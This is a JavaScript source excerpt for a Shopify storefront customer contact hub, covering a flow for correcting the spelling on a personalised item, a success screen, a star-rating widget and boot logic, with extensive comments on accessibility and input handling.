  if (!State.order || !State.spelling || !State.spelling.item) return false;
  return personalisedItems(State.order).indexOf(State.spelling.item) > -1;
}

function spellingLostCard() {
  return backBar(t("shared.backToOptions")) +
    '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
    '<div class="lc-card lc-card--warn">' +
      '<p>' + t("spelling.lost.body") + '</p>' +
      '<p style="margin:0"><button type="button" class="lc-btn" data-goto="fix-spelling">' +
        esc(t("shared.btn.startAgain")) + '</button></p>' +
    '</div>';
}

/* --- FIX MY SPELLING: the form -------------------------------------------- */
VIEWS.spellingForm = {
  render: function () {
    if (!spellingDraftValid()) return spellingLostCard();

    var order = State.order, el = evaluate(order), d = State.spelling;
    var max = personalisationMaxLength();

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
      '<p class="lc-step-note">' + spellingStepNote(el) + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      policyNote(el) +
      (el.interceptOnly ? interceptNoticeCard(el, t("intercept.what.change")) : "") +

      /* THE CURRENT SPELLING, PROMINENTLY, BEFORE THE INPUT. The customer is
         here because they think it is wrong; a good third of the time it is
         actually right and they have misremembered, and showing it large is the
         cheapest possible way to end those without a Discord message. */
      '<section class="lc-card">' +
        '<div class="lc-preview__h"><h2 style="font-size:calc(1.03529412em * var(--lc-heading-scale))">' +
          esc(t("spelling.current.heading")) + '</h2>' +
          '<span class="lc-chip lc-chip--quiet">' + esc(t("spelling.current.chip")) + '</span></div>' +
        '<p class="lc-spell-current">' + esc(d.current) + '</p>' +
        '<p class="lc-step-note" style="margin:10px 0 0">' +
          t("spelling.current.note", { item: esc(itemLabel(d.item)) }) + '</p>' +
      '</section>' +

      '<form class="lc-card" id="spell-form" novalidate>' +
        '<h2>' + esc(t("spelling.form.heading")) + '</h2>' +

        '<div class="lc-field">' +
          '<label for="sp-name">' + esc(t("spelling.form.label")) + '</label>' +
          '<p class="lc-hint" id="sp-rules">' + esc(spellingRulesCopy()) + '</p>' +
          /* maxlength is the browser's own belt; spellClean() in the input
             handler is the braces, because maxlength does nothing about a paste
             on some Android keyboards and nothing at all about emoji. And the
             server has to check it a third time — see CONFIG.personalisation. */
          '<input id="sp-name" type="text" autocomplete="off" autocapitalize="words" ' +
            'spellcheck="false" maxlength="' + max + '" ' +
            'value="' + esc(d.next || d.current) + '" ' +
            'aria-describedby="sp-rules sp-count sp-err">' +
          '<p class="lc-spell-count" id="sp-count" aria-live="polite"></p>' +
          '<p class="lc-field-error" id="sp-err" role="alert" hidden></p>' +
        '</div>' +

        /* THE SINGLE HIGHEST-VALUE ELEMENT ON THIS FLOW. Not decoration: the
           customer types into a 17px input and then reads it back at 2rem,
           which is the only reliable way anyone catches "Sofie" for "Sofia".
           aria-live is off — the counter above already announces on every
           keystroke, and two live regions firing together produce speech that
           cannot be followed. Screen-reader users get the value read back on
           the review screen instead, where it is announced once. */
        '<h3 style="margin:18px 0 8px">' + esc(t("spelling.form.readBack")) + '</h3>' +
        '<p class="lc-spell-echo" id="sp-echo" aria-live="off"></p>' +
        /* "will be stitched" is true on the PRODUCT page, where the customer is
           about to buy the thing. Here nothing has been agreed: this is a
           request the packing team can refuse, and the caveat card two screens
           on says exactly that. Promise the ASK, not the outcome. */
        '<p class="lc-step-note" style="margin:8px 0 0">' +
          t("spelling.form.readBackNote") + '</p>' +

        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn" id="sp-next">' +
            esc(t("spelling.form.next")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.cancel")) + '</button>' +
        '</div>' +
      '</form>';
  },

  mount: function () {
    var form = $("#spell-form");
    if (!form) return;
    var input = $("#sp-name"), echo = $("#sp-echo"), count = $("#sp-count"), err = $("#sp-err");
    var max = personalisationMaxLength();
    var d = State.spelling;

    /* IME GUARD. Chrome and Safari fire `input` DURING an active composition,
       and assigning `.value` or moving the selection while one is pending
       cancels or corrupts it in Blink/WebKit — which destroys Vietnamese Telex
       keystroke by keystroke, on a whitelist that deliberately includes the
       Vietnamese range. Leave the field alone until the IME commits, then run
       the full clean on `compositionend`. */
    var composing = false;

    function paint(opts) {
      opts = opts || {};
      if (composing) return;
      var res = spellClean(input.value);

      /* REWRITING THE FIELD UNDER THE CUSTOMER'S CURSOR is only acceptable if
         the cursor stays where they put it. Count how much was dropped BEFORE
         the caret and move it back by exactly that much, otherwise a stray
         emoji sends the caret to the end mid-word. */
      if (res.value !== input.value) {
        var caret = input.selectionStart;
        var before = typeof caret === "number" ? input.value.slice(0, caret) : "";
        var beforeKept = spellClean(before).value.length;
        input.value = res.value;
        if (typeof caret === "number") {
          try { input.setSelectionRange(beforeKept, beforeKept); } catch (e) {}
        }
      }

      var v = res.value;
      echo.textContent = v || t("spelling.form.echoEmpty");
      echo.className = "lc-spell-echo" + (v ? "" : " lc-spell-empty");
      count.textContent = t("spelling.form.count", { n: v.length, max: max });
      count.className = "lc-spell-count" + (v.length >= max ? " lc-is-full" : "");

      /* Friendly, never a hard rejection: say what happened, in the message
         area, and let them carry on typing.

         `emptied` is checked FIRST and is NOT suppressed by opts.quiet: when
         nothing at all survived, the customer is looking at an empty box and a
         dead Next button, and the reason is the only thing on screen worth
         saying. */
      if (res.emptied) {
        revealAlert(err, spellingNonLatinCopy());
      } else if (res.stripped && !opts.quiet) {
        revealAlert(err, t("spelling.form.stripped"));
      } else if (res.truncated && !opts.quiet) {
        revealAlert(err, t("spelling.form.truncated", { max: max }));
      } else if (!opts.keepError) {
        err.hidden = true; err.textContent = "";
        input.setAttribute("aria-invalid", "false");
      }
    }

    input.addEventListener("input", function (ev) {
      if (ev && ev.isComposing) return;
      paint();
    });
    input.addEventListener("compositionstart", function () { composing = true; });
    input.addEventListener("compositionend", function () { composing = false; paint(); });
    paint({ quiet:true });

    form.addEventListener("submit", function (ev) {
      ev.preventDefault();
      if (!spellingDraftValid()) { Router.go("spellingGate", { replace:true }); return; }

      var next = spellCanonical(input.value);

      if (!next) {
        input.setAttribute("aria-invalid", "true");
        revealAlert(err, spellClean(input.value).emptied
          ? spellingNonLatinCopy()
          : t("spelling.form.empty"));
        input.focus();
        return;
      }

      /* Hyphens and apostrophes alone are not a name. Mirrored in the product
         page's isValid() and required again server-side. */
      if (!spellHasLetter(next)) {
        input.setAttribute("aria-invalid", "true");
        revealAlert(err, t("spelling.form.needLetter"));
        input.focus();
        return;
      }

      /* IDENTICAL TO WHAT WE ALREADY HAVE. Sending this would put a message in
         front of the packing team asking them to change "Sofia" to "Sofia",
         which costs them a real interruption and tells the customer nothing.
         Say it plainly instead — quite often the spelling was right all along
         and this is the end of the ticket. */
      if (next.toLowerCase() === String(d.current).toLowerCase() && next === d.current) {
        input.setAttribute("aria-invalid", "true");
        revealAlert(err, t("spelling.form.unchanged"));
        input.focus();
        return;
      }

      err.hidden = true; err.textContent = "";
      input.setAttribute("aria-invalid", "false");
      d.next = next;
      Router.go("spellingReview", { fade:true });
    });
  }
};

/* --- FIX MY SPELLING: before / after review ------------------------------- */
VIEWS.spellingReview = {
  render: function () {
    if (!spellingDraftValid() || !State.spelling.next) return spellingLostCard();

    var order = State.order, d = State.spelling, el = evaluate(order);

    /* The same already-submitted guard addressReview carries, for the same
       reason: after a successful submit the stack is
       [hub, spellingForm, spellingReview, success], so ONE Back press lands
       here on a live, unticked form. */
    if (State.submitted["fix-spelling"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(spellingTitle()) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "fix-spelling");
    }

    /* Deliberately the SAME markup and the SAME classes as the address
       comparison — two blocks, one arrow, mint highlight on the changed line,
       and the change stated in words for anyone who cannot see the tint. */
    return '<div class="lc-crumbs">' +
        '<button type="button" class="lc-btn--link" data-back>' +
        esc(t("spelling.review.back")) + '</button></div>' +
      '<h1 data-view-title>' + esc(t("spelling.review.heading")) + '</h1>' +
      /* Sat directly above the "One honest caveat" card that says the opposite.
         Same fix as the form screen: this is the name we will ASK them to
         stitch. Everything after submission is already correctly hedged. */
      '<p class="lc-step-note">' +
        t("spelling.review.intro", { item: esc(itemLabel(d.item)) }) + '</p>' +

      '<section class="lc-card">' +
        '<div class="lc-addr-cmp">' +
          '<div class="lc-addr-cmp__side">' +
            '<h2 class="lc-addr-cmp__h" id="spell-h-current">' +
              esc(t("spelling.review.currentHeading")) + '</h2>' +
            '<div class="lc-addr-block lc-addr-block--current" role="group" ' +
              'aria-labelledby="spell-h-current">' +
              '<p class="lc-addr-line lc-addr-line--spell">' + esc(d.current) + '</p>' +
            '</div>' +
          '</div>' +
          '<div class="lc-addr-cmp__arrow" aria-hidden="true">' +
            '<svg viewBox="0 0 44 26" focusable="false" aria-hidden="true">' +
              '<path d="M3 13h33M26 4l10 9-10 9" fill="none" stroke="currentColor" ' +
                'stroke-width="3" stroke-linecap="round" stroke-linejoin="round"/></svg>' +
          '</div>' +
          '<div class="lc-addr-cmp__side">' +
            '<h2 class="lc-addr-cmp__h" id="spell-h-new">' +
              esc(t("spelling.review.newHeading")) + '</h2>' +
            '<div class="lc-addr-block lc-addr-block--new" role="group" ' +
              'aria-labelledby="spell-h-new">' +
              '<p class="lc-addr-line lc-addr-line--spell lc-is-changed">' +
                '<span class="sr-only">' + esc(t("spelling.review.changedSr")) + '</span>' +
                esc(d.next) +
                '<span class="lc-addr-flag" aria-hidden="true">' +
                esc(t("address.review.changedFlag")) + '</span></p>' +
            '</div>' +
          '</div>' +
        '</div>' +
      '</section>' +

      /* THE HONEST PART, and the reason this flow does not simply say "done".
         There is no customisation-status field in Shopify, so we do not know
         whether a needle has been through the fabric yet — and this is the
         screen to say so, before the checkbox, not after the request. */
      '<section class="lc-card lc-card--good">' +
        '<h2>' + esc(t("spelling.review.next.heading")) + '</h2>' +
        '<p>' + t("spelling.review.next.body1") + '</p>' +
        '<p style="margin:0">' + t("spelling.review.next.body2", {
          caveat: t(el.interceptOnly ? "spelling.review.next.caveatIntercept"
                                     : "spelling.review.next.caveatOpen"),
          email:  esc(order.email)
        }) + '</p>' +
      '</section>' +

      '<section class="lc-card">' +
        '<label class="lc-check" for="sp-confirm">' +
          '<input type="checkbox" id="sp-confirm">' +
          '<span>' + esc(t("spelling.review.confirmLabel")) + '</span>' +
        '</label>' +
        '<div class="lc-btn-row">' +
          /* aria-disabled rather than the real attribute, exactly as the address
             review does it: a truly disabled button leaves the tab order, so a
             keyboard user tabs from the checkbox straight past the primary
             action and is never told it exists. */
          '<button type="button" class="lc-btn" id="sp-complete" aria-disabled="true" ' +
            'aria-describedby="sp-complete-hint">' + esc(t("address.review.complete")) +
            '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("address.review.goBack")) + '</button>' +
        '</div>' +
        '<p id="sp-complete-hint" class="lc-step-note" style="margin:12px 0 0" aria-live="polite">' +
          esc(t("address.review.hintTick")) + '</p>' +
        /* Where a failed send is reported — see submitFailed(). */
        '<p class="lc-field-error" id="sp-form-err" role="alert" tabindex="-1" hidden></p>' +
      '</section>';
  },

  mount: function () {
    var box = $("#sp-confirm"), btn = $("#sp-complete"), hint = $("#sp-complete-hint");
    if (!box || !btn || !hint) return;
    var sending = false;

    box.addEventListener("change", function () {
      btn.setAttribute("aria-disabled", String(!box.checked));
      btn.textContent = t(box.checked ? "address.review.completeReady" : "address.review.complete");
      hint.textContent = t(box.checked ? "address.review.hintReady" : "address.review.hintTick");
    });

    btn.addEventListener("click", function () {
      if (sending) return;
      if (State.submitted["fix-spelling"]) {
        say(t("shared.say.alreadySent"));
        Router.go("spellingReview", { replace:true });
        return;
      }
      if (btn.getAttribute("aria-disabled") === "true") {
        say(t("address.review.sayTick"));
        hint.textContent = t("address.review.sayTick");
        box.focus();
        return;
      }
      if (!spellingDraftValid() || !State.spelling.next) {
        Router.go("spellingGate", { replace:true });
        return;
      }

      var order = State.order, d = State.spelling;
      var spErr = $("#sp-form-err");
      if (spErr) { spErr.hidden = true; spErr.textContent = ""; }
      sending = true;
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("shared.btn.sending"));
      say(t("shared.say.sending"));

      /* THE REAL SEND. Only the two things the customer actually chose go
         across: which line, and the new spelling. THE CURRENT SPELLING IS NOT
         SENT — the Worker reads it off the line item's own property, because it
         is the half of "change X to Y" the customer does not type, and taking
         it from the browser would let a crafted POST tell the packing team that
         an item currently reads something it does not. */
      submitRequest("fix-spelling", {
        lineItemId: d.item.id,
        name:       d.next
      }).then(function (res) {
        sending = false;
        if (!State.order || State.order !== order) {
          if (res && res.ok) say(submitAnnouncement("fix-spelling", res));
          return;
        }

        if (!res.ok) {
          submitFailed("fix-spelling", res, spErr, function (canRetry) {
            if (!canRetry) {
              btn.hidden = true;
              /* See the address review screen: this is an aria-live region
                 still holding "Ready to send." above a "NOT sent" alert. */
              if (hint) hint.textContent = "";
              return;
            }
            btn.setAttribute("aria-disabled", "false");
            btn.textContent = t("shared.btn.tryAgain");
            if (hint) hint.textContent = t("address.review.hintRetry");
          });
          return;
        }

        var id = res.requestId;
        var spEl = evaluate(order);
        /* The SERVER's state, not our stale copy — see interceptVerdict(). */
        var spIntercept = interceptVerdict(res, spEl);
        var label = itemLabel(d.item);

        var ctx = buildDiscordContext(order, {
          item: label,
          currentSpelling: d.current,
          newSpelling: d.next
        });

        /* ONLY NOW — see the same note in the cancel flow. */
        State.submitted["fix-spelling"] = id || true;
        State.result = {
          requestId: id,
          discordTitle: t("preview.title"),
          discord: CONFIG.discord.spellingChange(ctx),
          notion: baseNotionProps(order, "fix-spelling",
                    "Customer asked to correct the personalised spelling on " + order.name +
                    ": \"" + d.current + "\" → \"" + d.next + "\" on " + label + ".",
                    fmtDateTime(new Date().toISOString()) + " — Request " + idForLog(id) +
                    " raised from the contact hub. " +
                    (spIntercept ? interceptStaffLine(spEl) + " — INTERCEPTION REQUEST. " : "") +
                    /* STAFF-FACING, and it names the exact edit. The person
                       picking this up has to change a line item property, not
                       a product or a variant, and saying which one removes the
                       guesswork. */
                    "If " + CONFIG.fulfillment.threePL + " confirms it is not yet customised, " +
                    "update the \"" + personalisationKey() + "\" line item property on \"" +
                    label + "\" in Shopify to \"" + d.next + "\" and re-send the order detail " +
                    "to them. There is no customisation-status field in Shopify — the packing " +
                    "team's reply is the only confirmation that exists."),
          heading: t("spelling.success.heading"),
          blurb: t("spelling.success.blurb", {
            next: d.next, current: d.current, order: order.name, email: order.email
          }),
          flow: "fix-spelling",
          extraNote: joinNotes(
                       relayNote(res), recordNote(res),
                       spIntercept
                         ? interceptSuccessNote(spEl, true)
                         : t("spelling.success.note")),
          announce: submitAnnouncement("fix-spelling", res)
        };
        Router.go("success", { fade:true });
      })
      /* See the cancel flow. */
      .catch(function (e) {
        sending = false;
        if (window.console && console.error) console.error("[contact-hub] submit render", e);
        try {
          var told = !!State.submitted["fix-spelling"];
          submitFailed("fix-spelling",
            told ? { ok:false, told:true, reason:"render",
                     requestId: typeof State.submitted["fix-spelling"] === "string"
                       ? State.submitted["fix-spelling"] : "" }
                 : { ok:false, told:false, reason:"unknown" },
            spErr,
            function (canRetry) {
              if (!canRetry) { btn.hidden = true; if (hint) hint.textContent = ""; return; }
              btn.setAttribute("aria-disabled", "false");
              btn.textContent = t("shared.btn.tryAgain");
              if (hint) hint.textContent = t("address.review.hintRetry");
            });
        } catch (e2) { /* never throw out of a catch handler */ }
      });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* --- SUCCESS (shared) — shows the Discord + Notion previews ---------------- */
VIEWS.success = {
  render: function () {
    var r = State.result, order = State.order;

    /* ---- INTERNAL PREVIEWS — OFF BY DEFAULT IN THE THEME ----------------
       These two previews expose the 3PL's identity, the internal Discord
       channel and the Notion workflow columns to whoever is looking at the
       screen. The on-page note admitted they were "not something the customer
       would normally see" while showing them anyway, and there was no switch to
       turn them off. Set CONFIG.debug.showInternalPreviews = false for the
       theme build; the section setting turns it on for a preview theme.
       -------------------------------------------------------------------- */
    var internals = CONFIG.debug && CONFIG.debug.showInternalPreviews
      ? '<section class="lc-card lc-card--info">' +
          '<h2 style="font-size:calc(0.94117647em * var(--lc-heading-scale));margin-bottom:6px">' +
            esc(t("success.internal.heading")) + '</h2>' +
          /* THE PREVIEW IS THE HUB'S COPY, NOT THE SERVER'S ECHO. The Worker's
             response contract carries no echo of what it assembled — it returns
             the request id and which sinks accepted it, nothing more — so what
             is rendered below is the payload this page built and sent, labelled
             as such rather than presented as the sent article. The Worker
             re-sanitises every customer-typed string and reads the current
             spelling and item label off the order itself, so the wording it
             posts can legitimately differ in those places. */
          '<p style="margin:0">' + t("success.internal.body") + '</p>' +
        '</section>' +
        discordPreview(r.discordTitle, r.discord) +
        notionPreview(r.notion)
      : '';

    return '<h1 data-view-title>' + esc(r.heading) + '</h1>' +
      '<section class="lc-card lc-card--good">' +
        '<div class="lc-preview__h">' +
          /* THE SERVER'S ID OR NO ID AT ALL. It is the reference staff search
             for, so it is never backfilled with a locally-minted one — an id
             nobody on the team can find is worse than none. */
          (r.requestId
            ? '<span class="lc-chip">' + esc(t("success.chip.request", { id: r.requestId })) + '</span>'
            : '') +
          '<span class="lc-chip lc-chip--quiet">' + esc(order.name) + '</span></div>' +
        '<p>' + esc(r.blurb) + '</p>' +
        (r.extraNote ? '<p style="margin:0">' + esc(r.extraNote) + '</p>' : '') +
      '</section>' +

      internals +

      /* THE RATING SITS BELOW THE CONFIRMATION AND ABOVE THE EXITS. Above the
         buttons because a widget under "Back to hub" is a widget nobody sees;
         below the confirmation because the answer to "did we get it?" has to
         land before anybody is asked to grade it. */
      ratingCard() +

      '<div class="lc-btn-row">' +
        '<button type="button" class="lc-btn" data-goto="order-status">' +
          esc(t("shared.btn.seeMyStatus")) + '</button>' +
        '<button type="button" class="lc-btn lc-btn--ghost" data-home>' +
          esc(t("shared.btn.backToHub")) + '</button>' +
      '</div>';
  },

  /* THE OUTCOME ANNOUNCEMENT.

     Router.render() writes the step heading into the same live region 60ms
     after this runs, so an announcement made here directly would be wiped
     before a screen reader ever reached it — see announceStep(). This one is
     scheduled after that, and registered as a Router cleanup so navigating away
     cancels it instead of reading a confirmation over the next screen.

     The heading is not enough on its own: it cannot carry the request id, and
     it cannot say that the message to the packing team needed a human. A
     screen-reader user has to end up with the same information a sighted one
     gets from the chip and the note. */
  mount: function () {
    var msg = State.result && State.result.announce;
    if (!msg) return;
    var t = setTimeout(function () { say(msg); }, 900);
    Router.cleanups.push(function () { clearTimeout(t); });
  }
};

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   GLOBAL EVENT DELEGATION + BOOT
   =========================================================================== */
document.addEventListener("click", function (ev) {
  if (!ev.target || !ev.target.closest) return;

  /* ---- THE HUB RATING ------------------------------------------------
     The score is sent THE INSTANT a star is tapped, before the comment box is
     even shown. A rating half-given is still a rating, and the alternative —
     holding it until they press Send — loses every score from the large
     majority who tap a star and then close the tab. The comment, if one
     arrives, is a second write onto the same row. */
  var star = ev.target.closest("[data-rate]");
  if (star) {
    ev.preventDefault();
    var card = star.closest("[data-rate-card]");
    if (!card || card.getAttribute("data-rated")) return;

    var score = parseInt(star.getAttribute("data-rate"), 10);
    if (!(score >= 1 && score <= 5)) return;
    card.setAttribute("data-rated", String(score));

    submitRating("tool", score, "");

    /* The prompt changes with the score, because "anything you would change?"
       is the wrong question to put to somebody who just told us this did not
       help them at all. */
    var ask = score <= 2 ? t("rate.askLow") : t("rate.askHigh");
    card.innerHTML =
      '<h2 style="font-size:calc(0.94117647em * var(--lc-heading-scale));margin-bottom:6px">' +
        esc(t("rate.thanks")) + '</h2>' +
      '<p class="lc-step-note" style="margin-top:0">' + esc(ask) + '</p>' +
      /* `.lc-field` is the wrapper every other control in this hub uses — the
         styling hangs off the parent, not off a class on the element. */
      '<div class="lc-field">' +
        '<textarea rows="3" maxlength="600" ' +
          'data-rate-note aria-label="' + esc(ask) + '" ' +
          'placeholder="' + esc(t("rate.placeholder")) + '"></textarea>' +
      '</div>' +
      '<div class="lc-btn-row" style="margin-top:.5rem">' +
        '<button type="button" class="lc-btn lc-btn--ghost" data-rate-send>' +
          esc(t("rate.send")) + '</button>' +
      '</div>';
    say(t("rate.announce"));
    return;
  }

  var rateSend = ev.target.closest("[data-rate-send]");
  if (rateSend) {
    ev.preventDefault();
    var rcard = rateSend.closest("[data-rate-card]");
    if (!rcard) return;
    var note = rcard.querySelector("[data-rate-note]");
    var text = note ? String(note.value || "").slice(0, 600) : "";
    var rscore = parseInt(rcard.getAttribute("data-rated"), 10);

    /* Empty box, nothing to add — the score already went. Close the card
       rather than sending a second identical write. */
    if (text.replace(/\s+/g, "")) submitRating("tool", rscore, text);

    rcard.innerHTML =
      '<p style="margin:0">' + esc(t("rate.sent")) + '</p>';
    say(t("rate.sent"));
    return;
  }

  var back = ev.target.closest("[data-back]");
  if (back) { ev.preventDefault(); Router.back(); return; }

  var home = ev.target.closest("[data-home]");
  if (home) { ev.preventDefault(); Router.reset(); return; }

  /* "Not your order? Start again" — the shared-device escape hatch. */
  var swap = ev.target.closest("[data-switch-order]");
  if (swap) { ev.preventDefault(); switchOrder(); return; }

  /* Hub cards + any in-page CTA that jumps to a flow. */
  var goto = ev.target.closest("[data-goto]");
  if (goto) { ev.preventDefault(); startFlow(goto.getAttribute("data-goto")); return; }

  /* FAQ answer CTAs use the same target vocabulary as the hub cards. */
  var open = ev.target.closest("[data-lc-open]");
  if (open) { ev.preventDefault(); startFlow(open.getAttribute("data-lc-open")); return; }

  /* The hub's persistent "I still need help from a person" control. */
  var human = ev.target.closest("[data-lc-lastresort]");
  if (human) { ev.preventDefault(); showLastResortAnswer(); return; }

  /* Poster-less FAQ video: the placeholder button starts playback and gets out
     of the way. This is the ONLY thing that triggers the 7 MB download.
     DORMANT IN THE CURRENT CONFIG — CONFIG.faqVideoPoster is set, so no
     placeholder is rendered and nothing carries data-lc-play. It stays because
     an empty poster is a supported state (see lcRenderFaqVideo) and because the
     tabIndex restore below is what makes that state keyboard-usable. */
  var play = ev.target.closest("[data-lc-play]");
  if (play) {
    ev.preventDefault();
    var box = play.closest(".lc-answer__video");
    var vid = box && box.querySelector("video");
    play.hidden = true;
    if (vid) {
      /* The player was rendered tabindex="-1" while the placeholder covered it
         (see lcRenderFaqVideo). It is visible now, so put it back in the tab
         order. focus() works either way — programmatic focus ignores -1. */
      vid.tabIndex = 0;
      vid.focus();
      /* play() rejects on some mobile browsers when the gesture is not judged
         "user-initiated enough". Swallow it: the native controls are now
         visible and the customer can press play there. */
      var p = vid.play();
      if (p && typeof p.catch === "function") p.catch(function () {});
    }
    return;
  }
});

/* If the customer tabs straight to the player and presses play on the NATIVE
   controls, the placeholder is still sitting on top of it. `play` does not
   bubble, so this listens in the capture phase. */
document.addEventListener("play", function (ev) {
  var t = ev.target;
  if (!t || t.tagName !== "VIDEO" || !t.closest) return;
  var box = t.closest(".lc-answer__video");
  var ph = box && box.querySelector(".lc-video__ph");
  if (ph) ph.hidden = true;
  /* Nothing is covering it any more, so it becomes a normal tab stop. */
  t.tabIndex = 0;
}, true);

/* The hardware/browser Back button is the primary navigation instrument for
   this audience. Each Router.go() pushed a history entry, so a pop means "go
   back one step" — handled in-page instead of leaving the hub entirely. */
window.addEventListener("popstate", function (ev) {
  Router._popping = false;
  var depth = ev.state && ev.state.lcDepth ? ev.state.lcDepth : 1;
  if (Router.stack.length > depth) Router.popTo(depth);
  else if (Router.stack.length > 1)  Router.popTo(Router.stack.length - 1);
});

/* Escape abandons the current step, except while typing — Escape still needs
   to clear a search field. */
document.addEventListener("keydown", function (ev) {
  if (ev.key !== "Escape" && ev.keyCode !== 27) return;
  var t = ev.target, tag = t && t.tagName ? t.tagName.toLowerCase() : "";
  if (tag === "input" || tag === "textarea" || tag === "select" ||
      (t && t.isContentEditable)) return;
  if (Router.stack.length > 1) { ev.preventDefault(); Router.back(); }
});

/* ===========================================================================
   BOOT.

   The asset is loaded with `defer` from the section, so the DOM is parsed
   before this runs and #lc-view is guaranteed to exist on a normal page load.
   Two things are different from the prototype:

   1. THE THEME EDITOR. Saving a setting re-renders the section's markup but
      does NOT re-run this file, so the freshly-inserted #lc-view would sit
      empty and the merchant would think they had broken the page. Shopify fires
      `shopify:section:load` on the new element; we re-read the (also freshly
      re-rendered) JSON blob and boot again, so settings changes appear live.
      `shopify:section:unload` clears the intervals so a countdown from a
      discarded copy of the section cannot keep ticking against a dead node.

   2. IT IS GUARDED. If the section markup is missing — someone rendered the
      asset without the section, or an app stripped the wrapper — we do nothing
      at all rather than throwing on a null host and filling the merchant's
      console with noise on every page of the store.
   =========================================================================== */
/* THE TYPE SCALE, APPLIED.

   Writes CONFIG.type onto #lc-hub as the two custom properties the stylesheet
   reads. On a storefront the section has already written the same two values
   into the style attribute server-side, so this is idempotent there and exists
   for the two cases where it is not:

     * the standalone prototype, which has no Liquid to write them;
     * the theme editor, where `shopify:section:load` re-runs lcBoot() after the
       merchant drags the slider.

   BOTH VALUES ARE CLAMPED to the schema's own range. A hand-edited JSON blob or
   a stale saved setting must not be able to render the hub at 2px or at 400% —
   the palette's contrast ratios were signed off across 14-22px and nowhere
   else, and nothing outside that band has been checked for horizontal overflow
   at 375px. Anything unparseable falls back to the shipped 17px / 100%. */
function lcClampNumber(v, lo, hi, fallback) {
  var n = typeof v === "number" ? v : parseFloat(v);
  if (!isFinite(n)) return fallback;
  return Math.min(hi, Math.max(lo, n));
}

function lcApplyTypeScale() {
  var host = document.getElementById("lc-hub");
  if (!host || !host.style || !host.style.setProperty) return;
  var t = CONFIG.type || {};
  var base = lcClampNumber(t.baseSize, 14, 22, 17);
  var scale = lcClampNumber(t.headingScale, 90, 140, 100);
  host.style.setProperty("--lc-base", base + "px");
  /* The stylesheet multiplies by this directly, so it is a ratio, not a
     percentage: 100 -> 1. */
  host.style.setProperty("--lc-heading-scale", String(scale / 100));
}

function lcBoot() {
  if (!$("#lc-view")) return;
  lcApplyTypeScale();
  lcApplyHeaderVisibility();
  lcResolveFaqTokens();
  /* TAKEN BEFORE THE FIRST RENDER, and taking it removes it. Two reasons for
     the order: Router._pushHistory() replaceStates "#hub" the moment the hub
     paints, which would wipe a #-fragment route before anything had read it;
     and stripping the params up front means a refresh, a Back press or a
     theme-editor re-boot finds a clean URL and cannot replay the route. */
  var deep = lcTakeDeepLink();
  Router.stack = [];
  Router.go("hub");
  /* AFTER the hub is on screen, never instead of it. A deep link that does not
     validate simply returns, and the customer is left looking at the hub. */
  lcApplyDeepLink(deep);

  /* THE BOOT IS OVER. Everything above painted with the caret still at the
     document start — the hub, and the deep-linked screen on top of it if there
     was one. From here every render is a real navigation and gets focus plus an
     announcement, which is where they were always doing the work.
     Unconditional: on a theme-editor re-boot it is already true, and true is
     the right answer there — a section reload is not a fresh arrival. */
  Router._firstRenderDone = true;
}

lcBoot();

["click","keydown","input","touchstart"].forEach(function (evt) {
  document.addEventListener(evt, touchIdleTimer, { passive:true });
});

document.addEventListener("shopify:section:load", function (ev) {
  if (!ev.target || !ev.target.querySelector || !ev.target.querySelector("#lc-view")) return;
  _lcIconCache = {};                 // the snippet may have been re-rendered
  lcApplyBlobConfig(CONFIG);         // pick up whatever the merchant just saved
  /* AND RE-APPLY THE BLANK GUARD. The theme editor re-renders the section on
     every keystroke, so this is the path a merchant is on at the exact moment
     they clear a field — restoring only at first boot would leave the editor
     preview showing the broken state the storefront never gets. */
  lcRestoreBlankedStrings();
  /* AND RE-FLATTEN THE COPY LAYERS. Without this the merchant edits a heading
     in the theme editor, the blob is re-read, and the screen still renders the
     old one — the failure mode that makes people think the setting is broken. */
  lcApplyCopyConfig();
  lcBoot();
});

document.addEventListener("shopify:section:unload", function (ev) {
  if (!ev.target || !ev.target.querySelector || !ev.target.querySelector("#lc-view")) return;
  Router.clearTimers();
});


/* THE SINGLE DELIBERATE GLOBAL. Everything else in this file is sealed inside
   the IIFE precisely so it cannot collide with the theme or an app; this one
   handle is exported so a developer can inspect state from the console and so a
   future returns hub can reuse the read-only helpers. It is a debugging surface,
   not an API: nothing here mutates State, and no theme code should depend on it
   staying the same shape. */
window.LC_HUB = {
  CONFIG: CONFIG, State: State, Router: Router, VIEWS: VIEWS, FLOWS: FLOWS,
  evaluate: evaluate, normaliseOrder: normaliseOrder,
  deriveCustomerName: deriveCustomerName, clearOrderSession: clearOrderSession,
  /* Round 5 — the personalisation/spelling helpers, exported for driving that
     flow from the console. Read-only. */
  personalisedItems: personalisedItems, lineItemProperty: lineItemProperty,
  spellClean: spellClean, spellCanonical: spellCanonical,
  swapBuildIndex: swapBuildIndex, catalogueItems: catalogueItems,
  /* THE COPY SYSTEM, for the console and for the COPY-KEYS.md generator's own
     sanity check. `COPY` is the shipped defaults, `t` resolves through the
     override layers, `copyOverrides` is what the section actually supplied. */
  COPY: COPY, t: t, copyOverrides: function () { return COPY_OVERRIDES; },
  applyCopyConfig: lcApplyCopyConfig,
  q: $, qa: $$
};
})();
